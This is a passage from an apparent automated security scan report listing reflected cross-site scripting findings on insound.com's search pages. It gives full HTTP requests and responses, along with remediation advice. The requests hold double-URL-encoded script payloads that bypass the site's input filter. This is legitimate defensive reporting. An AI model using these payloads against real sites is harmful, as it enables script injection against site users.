This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Agallochf2346%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17419aa4d55&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=634891aud6fh92c22q04ep9qo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=202021513; expires=Sun, 09-Jan-2011 02:40:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=70066268; expires=Sun, 09-Jan-2011 02:40:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Agallochf2346</title><script>alert(1)</script>17419aa4d55</title>
...[SNIP]...

1.2. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Agalloch&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7553970dfac was submitted in the REST URL parameter 3. This input was echoed as f2e00"><script>alert(1)</script>7553970dfac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Agallochf2e00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7553970dfac&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c9hq9a3bn2lgop6anfuir9lu72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=330084251; expires=Sun, 09-Jan-2011 02:40:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=499813430; expires=Sun, 09-Jan-2011 02:40:30 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Agallochf2e00"><script>alert(1)</script>7553970dfac" />
...[SNIP]...

1.3. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Art%20Department&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a7b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c395655252 was submitted in the REST URL parameter 3. This input was echoed as 36a7b"><script>alert(1)</script>9c395655252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Art%20Department36a7b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c395655252&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qsiudiqo07g0he699gcpddmsp3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=235463841; expires=Sun, 09-Jan-2011 02:37:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=43683784; expires=Sun, 09-Jan-2011 02:37:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Art Department36a7b"><script>alert(1)</script>9c395655252" />
...[SNIP]...

1.4. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Art%20Department&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 75ca3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30e92eb4870 was submitted in the REST URL parameter 3. This input was echoed as 75ca3</title><script>alert(1)</script>30e92eb4870 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Art%20Department75ca3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30e92eb4870&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ep29udjj6umuvdrkc5eigf0564; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=309894262; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=424582467; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Art Department75ca3</title><script>alert(1)</script>30e92eb4870</title>
...[SNIP]...

1.5. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Barbara%20Morgenstern&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8459b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb57b9a199c was submitted in the REST URL parameter 3. This input was echoed as 8459b</title><script>alert(1)</script>cb57b9a199c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Barbara%20Morgenstern8459b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb57b9a199c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1sddod10ggfk6hpomapg746nb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=242487712; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=536451074; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Barbara Morgenstern8459b</title><script>alert(1)</script>cb57b9a199c</title>
...[SNIP]...

1.6. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Barbara%20Morgenstern&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 979d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f8bcdf69e7 was submitted in the REST URL parameter 3. This input was echoed as 979d6"><script>alert(1)</script>0f8bcdf69e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Barbara%20Morgenstern979d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f8bcdf69e7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tuoge82njlg5gmilbu72gjoas0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=360663585; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=306659547; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Barbara Morgenstern979d6"><script>alert(1)</script>0f8bcdf69e7" />
...[SNIP]...

1.7. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Bjørn%20Torske&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload eba07%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6222e7940c6 was submitted in the REST URL parameter 3. This input was echoed as eba07</title><script>alert(1)</script>6222e7940c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Bjeba07%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6222e7940c6..rn%20Torske&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b37vrlaoivpk40a9bi51n3it16; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=461067654; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=337211473; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Bjeba07</title><script>alert(1)</script>6222e7940c6..rn Torske</title>
...[SNIP]...

1.8. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Bjørn%20Torske&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd41e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bddc1aa843 was submitted in the REST URL parameter 3. This input was echoed as dd41e"><script>alert(1)</script>8bddc1aa843 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Bjdd41e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bddc1aa843..rn%20Torske&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=gpf0hm7u2bnf7p2n07f61m92j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=378021985; expires=Sun, 09-Jan-2011 02:40:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=488756586; expires=Sun, 09-Jan-2011 02:40:47 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Bjdd41e"><script>alert(1)</script>8bddc1aa843..rn Torske" />
...[SNIP]...

1.9. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blank%20Dogs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e578%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb16a61fd2 was submitted in the REST URL parameter 3. This input was echoed as 5e578"><script>alert(1)</script>fb16a61fd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blank%20Dogs5e578%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb16a61fd2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i0ff4qi9u1rc5tsi33tvtlhir2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=126106492; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=98122353; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Blank Dogs5e578"><script>alert(1)</script>fb16a61fd2" />
...[SNIP]...

1.10. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blank%20Dogs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 5e9f8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d1968c2ef was submitted in the REST URL parameter 3. This input was echoed as 5e9f8</title><script>alert(1)</script>34d1968c2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blank%20Dogs5e9f8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d1968c2ef&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e9u56t5aued21hsdl9furi28i0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=32536722; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=76660747; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Blank Dogs5e9f8</title><script>alert(1)</script>34d1968c2ef</title>
...[SNIP]...

1.11. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blonde%20Redhead&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 49bba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7cc6fbc821c was submitted in the REST URL parameter 3. This input was echoed as 49bba</title><script>alert(1)</script>7cc6fbc821c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blonde%20Redhead49bba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7cc6fbc821c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2995ss7bvdfrgh08g1heb16pm2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=414114324; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=517843897; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Blonde Redhead49bba</title><script>alert(1)</script>7cc6fbc821c</title>
...[SNIP]...

1.12. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blonde%20Redhead&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e48f4f488cc7 was submitted in the REST URL parameter 3. This input was echoed as 760b7"><script>alert(1)</script>48f4f488cc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blonde%20Redhead760b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e48f4f488cc7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0n0snfl9t8rifi6a1isdr555t6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=130844079; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=367202106; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Blonde Redhead760b7"><script>alert(1)</script>48f4f488cc7" />
...[SNIP]...

1.13. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
